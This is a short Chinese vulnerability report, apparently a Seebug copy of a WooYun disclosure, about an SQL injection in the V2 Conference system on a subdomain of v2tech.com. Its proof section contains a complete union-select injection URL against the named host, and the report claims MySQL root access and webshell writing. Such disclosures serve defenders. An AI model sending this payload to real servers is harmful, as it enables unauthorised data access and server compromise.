威速科技官网某子站SQL注入可提权服务器

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: ### 详细说明: 第三方会议系统,V2 Conference. 见: [WooYun: V2视频会议系统某处SQL注射、XXE漏洞(可getshell)](http://www.wooyun.org/bugs/wooyun-2015-0143276) ### 漏洞证明: ``` http://zuyong.v2tech.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user%28%29,3,version%28%29,5%23 ``` [<img src="https://images.seebug.org/upload/201604/12164230d38d7e4e395a7258145cbac757bfe864.png" alt="11111.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/12164230d38d7e4e395a7258145cbac757bfe864.png) mysql root权限注入,可写shell. [<img src="https://images.seebug.org/upload/201604/121644496e0edaa4fb486c9a317b2576d4551801.png" alt="22222.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201604/121644496e0edaa4fb486c9a317b2576d4551801.png) [<img src="https://images.seebug.org/upload/201604/1216455668a95c433e1c506dd126111ff74b107d.png" alt="33333.png" width="600"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息